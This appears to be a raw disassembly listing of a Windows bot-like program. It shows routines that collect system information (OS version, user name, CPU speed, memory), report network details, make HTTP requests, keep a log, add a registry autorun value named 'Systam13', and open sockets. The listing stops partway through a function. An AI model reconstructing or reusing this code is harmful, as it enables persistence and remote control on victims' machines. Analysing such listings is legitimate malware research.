loc_40B7F3: ; CODE XREF: sub_40B78A+2E�j
cmp [ebp+var_90], 5
jnz short loc_40B81D
cmp [ebp+var_8C], esi
jz short loc_40B7E4
cmp [ebp+var_8C], 1
jnz short loc_40B811
loc_40B80D: ; CODE XREF: sub_40B78A+67�j
push 3
jmp short loc_40B81C
; ---------------------------------------------------------------------------
loc_40B811: ; CODE XREF: sub_40B78A+81�j
cmp [ebp+var_8C], 2
jnz short loc_40B81D
push 7
loc_40B81C: ; CODE XREF: sub_40B78A+4F�j
; sub_40B78A+5C�j ...
pop esi
loc_40B81D: ; CODE XREF: sub_40B78A+25�j
; sub_40B78A+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_40B78A endp
; =============== S U B R O U T I N E =======================================
sub_40B822 proc near ; CODE XREF: sub_40B8D8+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_40B82A: ; CODE XREF: sub_40B822+2F�j
; sub_40B822+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call ds:dword_424064 ; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call sub_419250
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_40B82A
jb short loc_40B859
cmp ebx, esi
ja short loc_40B82A
loc_40B859: ; CODE XREF: sub_40B822+31�j
push 0
push 64h
push edi
push ebx
call sub_4191D0
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_40B8CC
jb short loc_40B878
cmp esi, 50h
jnb short loc_40B87D
loc_40B878: ; CODE XREF: sub_40B822+4F�j
push 4Bh
xor edx, edx
pop eax
loc_40B87D: ; CODE XREF: sub_40B822+54�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B888
cmp esi, 47h
jnb short loc_40B88D
loc_40B888: ; CODE XREF: sub_40B822+5F�j
push 42h
xor edx, edx
pop eax
loc_40B88D: ; CODE XREF: sub_40B822+64�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B898
cmp esi, 37h
jnb short loc_40B89D
loc_40B898: ; CODE XREF: sub_40B822+6F�j
push 32h
xor edx, edx
pop eax
loc_40B89D: ; CODE XREF: sub_40B822+74�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B8A8
cmp esi, 26h
jnb short loc_40B8AD
loc_40B8A8: ; CODE XREF: sub_40B822+7F�j
push 21h
xor edx, edx
pop eax
loc_40B8AD: ; CODE XREF: sub_40B822+84�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B8B8
cmp esi, 1Eh
jnb short loc_40B8BD
loc_40B8B8: ; CODE XREF: sub_40B822+8F�j
push 19h
xor edx, edx
pop eax
loc_40B8BD: ; CODE XREF: sub_40B822+94�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B8C8
cmp esi, 0Ah
jnb short loc_40B8CC
loc_40B8C8: ; CODE XREF: sub_40B822+9F�j
xor eax, eax
xor edx, edx
loc_40B8CC: ; CODE XREF: sub_40B822+4D�j
; sub_40B822+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_40B822 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8D8 proc near ; CODE XREF: sub_40EE72+59EC�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_43C80C
mov [ebp+var_CC], 94h
call ds:dword_424144 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_40B95F
cmp [ebp+var_C4], ebx
jnz short loc_40B93B
cmp [ebp+var_BC], 1
jnz short loc_40B925
mov [ebp+var_4], offset a95 ; "95"
loc_40B925: ; CODE XREF: sub_40B8D8+44�j
cmp [ebp+var_BC], 2
jnz loc_40B9DA
mov [ebp+var_4], offset aNt ; "NT"
jmp short loc_40B9AB
; ---------------------------------------------------------------------------
loc_40B93B: ; CODE XREF: sub_40B8D8+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_40B94D
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_40B9A2
; ---------------------------------------------------------------------------
loc_40B94D: ; CODE XREF: sub_40B8D8+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_40B99B
mov [ebp+var_4], offset aMe ; "ME"
jmp short loc_40B9A2
; ---------------------------------------------------------------------------
loc_40B95F: ; CODE XREF: sub_40B8D8+33�j
cmp [ebp+var_C8], 5
jnz short loc_40B99B
cmp [ebp+var_C4], ebx
jnz short loc_40B979
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_40B9A2
; ---------------------------------------------------------------------------
loc_40B979: ; CODE XREF: sub_40B8D8+96�j
cmp [ebp+var_C4], 1
jnz short loc_40B98B
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_40B9A2
; ---------------------------------------------------------------------------
loc_40B98B: ; CODE XREF: sub_40B8D8+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_40B9A2
loc_40B99B: ; CODE XREF: sub_40B8D8+7C�j
; sub_40B8D8+8E�j
mov [ebp+var_4], offset dword_42DDDC
loc_40B9A2: ; CODE XREF: sub_40B8D8+73�j
; sub_40B8D8+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_40B9DA
loc_40B9AB: ; CODE XREF: sub_40B8D8+61�j
cmp [ebp+var_B8], bl
jz short loc_40B9DA
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset dword_42DDD4
push eax
call sub_4172AE
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_40B9DA: ; CODE XREF: sub_40B8D8+54�j
; sub_40B8D8+D1�j ...
mov ax, ds:word_42DDD0
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, ds:dword_43F554
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_40BA13
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_40BA13: ; CODE XREF: sub_40B8D8+12C�j
push [ebp+arg_4]
call sub_40AEE0
pop ecx
push eax
call ds:dword_43F6A8 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_43F620 ; gethostbyaddr
cmp eax, ebx
jz short loc_40BA3C
push dword ptr [eax]
jmp short loc_40BA41
; ---------------------------------------------------------------------------
loc_40BA3C: ; CODE XREF: sub_40B8D8+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_40BA41: ; CODE XREF: sub_40B8D8+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_4172AE
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call ds:dword_424068 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_42409C ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_424098 ; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call ds:dword_424148 ; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_4192B8
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_40D12A
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_40B721
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
call sub_40B822
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+arg_0]
call sub_41782A
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_40B8D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB8C proc near ; CODE XREF: sub_40EE72+4555�p
; sub_40EE72+5A1D�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_417330
add esp, 0Ch
cmp ds:dword_43F750, 0
jnz short loc_40BBF8
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call ds:dword_43F538 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_40BBE1
lea eax, [ebp+var_8C]
push offset dword_42DE50
push eax
call sub_4172AE
pop ecx
pop ecx
loc_40BBE1: ; CODE XREF: sub_40BB8C+40�j
test [ebp+var_C], 1
jz short loc_40BBEE
push offset dword_42DE48
jmp short loc_40BBF3
; ---------------------------------------------------------------------------
loc_40BBEE: ; CODE XREF: sub_40BB8C+59�j
push offset dword_42DE44
loc_40BBF3: ; CODE XREF: sub_40BB8C+60�j
lea eax, [ebp+var_8]
jmp short loc_40BC10
; ---------------------------------------------------------------------------
loc_40BBF8: ; CODE XREF: sub_40BB8C+28�j
mov esi, offset off_42DE40
lea eax, [ebp+var_8]
push esi
push eax
call sub_4172AE
pop ecx
lea eax, [ebp+var_8C]
pop ecx
push esi
loc_40BC10: ; CODE XREF: sub_40BB8C+6A�j
push eax
call sub_4172AE
pop ecx
pop ecx
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+arg_0]
call sub_41782A
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_40BB8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC4B proc near ; DATA XREF: sub_40EE72+4974�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_42DF80
call sub_417330
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_417330
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_417330
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_417330
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_417330
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call ds:dword_43F570 ; InternetCrackUrlA
test eax, eax
jz loc_40BDE5
cmp [ebp+var_34], ebx
jbe short loc_40BD22
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_418C10
add esp, 0Ch
loc_40BD22: ; CODE XREF: sub_40BC4B+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_40BD40
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_418C10
add esp, 0Ch
loc_40BD40: ; CODE XREF: sub_40BC4B+DE�j
cmp [ebp+var_20], ebx
jbe short loc_40BD5A
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_418C10
add esp, 0Ch
loc_40BD5A: ; CODE XREF: sub_40BC4B+F8�j
cmp [ebp+var_18], ebx
jbe short loc_40BD74
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_418C10
add esp, 0Ch
loc_40BD74: ; CODE XREF: sub_40BC4B+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push ds:dword_43F618
call ds:dword_43F63C ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_40BDFD
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call ds:dword_43F630 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40BE04
push ebx
push ebx
push ebx
push ebx
push eax
call ds:dword_43F5E4 ; HttpSendRequestA
test eax, eax
jz short loc_40BDDE
push offset dword_42DF54
jmp short loc_40BE09
; ---------------------------------------------------------------------------
loc_40BDDE: ; CODE XREF: sub_40BC4B+18A�j
push offset unk_42DF08
jmp short loc_40BE09
; ---------------------------------------------------------------------------
loc_40BDE5: ; CODE XREF: sub_40BC4B+B7�j
lea eax, [ebp+var_55C]
push offset dword_42DEDC
push eax
call sub_4172AE
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_40BE17
; ---------------------------------------------------------------------------
loc_40BDFD: ; CODE XREF: sub_40BC4B+153�j
push offset unk_42DEA0
jmp short loc_40BE09
; ---------------------------------------------------------------------------
loc_40BE04: ; CODE XREF: sub_40BC4B+17B�j
push offset unk_42DE60
loc_40BE09: ; CODE XREF: sub_40BC4B+191�j
; sub_40BC4B+198�j ...
lea eax, [ebp+var_55C]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_40BE17: ; CODE XREF: sub_40BC4B+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_40BE42
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_40D679
add esp, 14h
loc_40BE42: ; CODE XREF: sub_40BC4B+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_40BF6D
pop ecx
push esi
call ds:dword_43F69C ; InternetCloseHandle
push [ebp+var_4]
call ds:dword_43F69C ; InternetCloseHandle
push [ebp+var_1D8]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
pop edi
pop esi
pop ebx
sub_40BC4B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE75 proc near ; CODE XREF: sub_40EE72+448E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_444340
mov edi, 0B8h
loc_40BE89: ; CODE XREF: sub_40BE75+33�j
cmp byte ptr [esi], 0
jz short loc_40BEAC
push [ebp+arg_0]
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40BEAC
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_444EC0
jl short loc_40BE89
jmp short loc_40BEEE
; ---------------------------------------------------------------------------
loc_40BEAC: ; CODE XREF: sub_40BE75+17�j
; sub_40BE75+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_444340[esi]
push ebx
call sub_417330
push 17h
push [ebp+arg_0]
push ebx
call sub_418C10
push 9Fh
lea eax, dword_444358[esi]
push [ebp+arg_4]
push eax
call sub_418C10
add esp, 24h
inc ds:dword_4313B4
pop ebx
loc_40BEEE: ; CODE XREF: sub_40BE75+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_40BE75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEF5 proc near ; CODE XREF: sub_40EE72+5B56�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_42DF90
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
xor edi, edi
mov esi, offset dword_444340
loc_40BF1F: ; CODE XREF: sub_40BEF5+72�j
cmp byte ptr [esi], 0
jz short loc_40BF5A
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_42DF84
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41782A
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 2Ch
loc_40BF5A: ; CODE XREF: sub_40BEF5+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_444EC0
jl short loc_40BF1F
pop edi
pop esi
leave
retn
sub_40BEF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF6D proc near ; CODE XREF: sub_401000+9A�p
; sub_4010B5+314�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_42406C ; GetLocalTime
mov ebx, offset dword_443A34
mov edi, 80h
mov esi, offset dword_43FA34
loc_40BF8F: ; CODE XREF: sub_40BF6D+3D�j
cmp byte ptr [ebx], 0
jz short loc_40BFA6
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_418C10
add esp, 0Ch
loc_40BFA6: ; CODE XREF: sub_40BF6D+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_40BF8F
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41782A
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_40BF6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFE1 proc near ; CODE XREF: sub_407BDE+15B�p
; sub_407D66+1AF�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_4193FF
lea eax, [ebp+var_80]
push eax
call sub_40BF6D
add esp, 14h
leave
retn
sub_40BFE1 endp
; =============== S U B R O U T I N E =======================================
sub_40C00D proc near ; CODE XREF: sub_40EE72+5A4D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_43FA34
xor ecx, ecx
loc_40C014: ; CODE XREF: sub_40C00D+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_443A34
jl short loc_40C014
cmp [esp+arg_C], ecx
push esi
mov esi, offset dword_42DFC4
jnz short loc_40C044
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_40D679
add esp, 14h
loc_40C044: ; CODE XREF: sub_40C00D+1F�j
push esi
call sub_40BF6D
pop ecx
pop esi
retn
sub_40C00D endp
; =============== S U B R O U T I N E =======================================
sub_40C04D proc near ; CODE XREF: sub_402DD7+2AE�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_43FA34
loc_40C053: ; CODE XREF: sub_40C04D+27�j
cmp byte ptr [esi], 0
jz short loc_40C068
push [esp+4+arg_0]
push esi
call sub_40A96F
pop ecx
test eax, eax
pop ecx
jnz short loc_40C07A
loc_40C068: ; CODE XREF: sub_40C04D+9�j
add esi, 80h
cmp esi, offset dword_443A34
jl short loc_40C053
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40C07A: ; CODE XREF: sub_40C04D+19�j
push 1
pop eax
pop esi
retn
sub_40C04D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C07F proc near ; DATA XREF: sub_40EE72+5B00�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_40C0D2
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_42E018
push eax
push [ebp+var_11C]
call sub_40D679
add esp, 14h
loc_40C0D2: ; CODE XREF: sub_40C07F+33�j
cmp [ebp+var_98], 0
jz short loc_40C0F2
lea eax, [ebp+var_98]
push eax
call sub_41781F
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_40C0F2
mov [ebp+var_8], eax
loc_40C0F2: ; CODE XREF: sub_40C07F+5A�j
; sub_40C07F+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_43FA34
loc_40C0FB: ; CODE XREF: sub_40C07F+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_40C155
cmp byte ptr [esi], 0
jz short loc_40C144
cmp [ebp+var_98], 0
jz short loc_40C12A
cmp [ebp+var_4], 0
jnz short loc_40C12A
lea eax, [ebp+var_98]
push eax
push esi
call sub_40A96F
pop ecx
test eax, eax
pop ecx
jz short loc_40C144
loc_40C12A: ; CODE XREF: sub_40C07F+90�j
; sub_40C07F+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_40D679
add esp, 14h
loc_40C144: ; CODE XREF: sub_40C07F+87�j
; sub_40C07F+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_443A34
jl short loc_40C0FB
loc_40C155: ; CODE XREF: sub_40C07F+82�j
lea eax, [ebp+var_31C]
push offset dword_42DFEC
push eax
call sub_4172AE
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_40C18F
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_40D679
add esp, 14h
loc_40C18F: ; CODE XREF: sub_40C07F+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_40BF6D
push [ebp+var_18]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_40C07F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C1AE proc near ; CODE XREF: sub_40AC42+1E�p
; sub_40E6A9+346�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_42E038
xor esi, esi
mov ebx, offset aSystam13 ; "Systam13"
loc_40C1C1: ; CODE XREF: sub_40C1AE+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call ds:dword_43F61C ; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_40C1FB
push [ebp+arg_0]
call sub_417AB0
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call ds:dword_43F68C ; RegSetValueExA
jmp short loc_40C205
; ---------------------------------------------------------------------------
loc_40C1FB: ; CODE XREF: sub_40C1AE+2F�j
push ebx
push [ebp+var_4]
call ds:dword_43F5D4 ; RegDeleteValueA
loc_40C205: ; CODE XREF: sub_40C1AE+4B�j
push [ebp+var_4]
call ds:dword_43F644 ; RegCloseKey
add edi, 8
cmp edi, offset dword_42E050
jb short loc_40C1C1
pop edi
pop esi
pop ebx
leave
retn
sub_40C1AE endp
; =============== S U B R O U T I N E =======================================
sub_40C21E proc near ; CODE XREF: sub_40C259+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_40C253
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_40C237: ; CODE XREF: sub_40C21E+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_424298[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_40C237
pop edi
pop ebx
loc_40C253: ; CODE XREF: sub_40C21E+E�j
mov eax, esi
pop esi
not eax
retn
sub_40C21E endp
; =============== S U B R O U T I N E =======================================
sub_40C259 proc near ; CODE XREF: sub_40CAF1+24A�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_417B89
mov [esp+10h+var_10], offset aRb ; "rb"
push [esp+10h+arg_0]
mov esi, eax
call sub_4179A8
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_40C2A8
loc_40C27E: ; CODE XREF: sub_40C259+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_40C2AC
inc ebx
push ebx
push esi
call sub_41944F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40C2A8
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_418A86
add esp, 10h
jmp short loc_40C27E
; ---------------------------------------------------------------------------
loc_40C2A8: ; CODE XREF: sub_40C259+23�j
; sub_40C259+39�j
xor eax, eax
jmp short loc_40C2C7
; ---------------------------------------------------------------------------
loc_40C2AC: ; CODE XREF: sub_40C259+29�j
dec ebx
push ebx
push esi
call sub_40C21E
push esi
mov ebx, eax
call sub_417C3B
push edi
call sub_417900
add esp, 10h
mov eax, ebx
loc_40C2C7: ; CODE XREF: sub_40C259+51�j
pop edi
pop esi
pop ebx
retn
sub_40C259 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2CB proc near ; CODE XREF: sub_40C351+33�p
; sub_40C8B4+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call ds:dword_43F6E8 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_40C347
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call ds:dword_43F668 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_43F6A8 ; inet_addr
cmp eax, esi
jnz short loc_40C32C
push [ebp+arg_0]
